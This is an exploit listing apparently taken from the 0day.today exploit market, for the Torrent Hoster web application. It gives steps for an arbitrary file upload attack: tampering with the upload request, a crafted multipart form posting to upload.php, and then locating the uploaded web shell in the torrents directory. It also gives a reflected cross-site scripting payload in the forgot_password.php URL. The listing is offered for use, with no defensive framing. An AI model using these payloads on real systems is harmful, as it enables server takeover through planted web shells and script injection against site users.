[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Torrent Hoster Remont Upload Exploit

Author
El-Kahina
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11295
Category
web applications
Date add
15-03-2010
Platform
unsorted
====================================
Torrent Hoster Remont Upload Exploit 
====================================

========================================================================================                 
| # Title    : Torrent Hoster Remont Upload Exploit          
| # Author   : El-Kahina                                                                                                               
| # Home     : www.h4kz.com                                                                              |                                                                                                                              
| # Script   : Powered by Torrent Hoster.    
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)      
| # Bug      : Upload   
|                                                                 
======================      Exploit By El-Kahina       =================================
 # Exploit  :
  
 1 - use tamper data :
  
 http://127.0.0.1/torrenthoster//torrents.php?mode=upload
  
 2-
    <center>
   Powered by Torrent Hoster
        <br />
        <form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
        <strong>&#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533; &#65533;&#65533; &#65533;&#65533;:</strong> <?php echo $maxfilesize; ?>&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;<br />
<br>
        <input type="file" name="upfile" size="50" /><br />
<input type="submit" value="&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;" id="upload" />
        </form>
        <div id="part2" style="display: none;">&#65533;&#65533;&#65533; &#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533; .. &#65533;&#65533; &#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;</div>
        </center>
         
3 - http://127.0.0.1/torrenthoster/torrents/  (to find shell)     
         
4 - Xss:
 
http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt>
        
==========================================



#  0day.today [2024-11-16]  #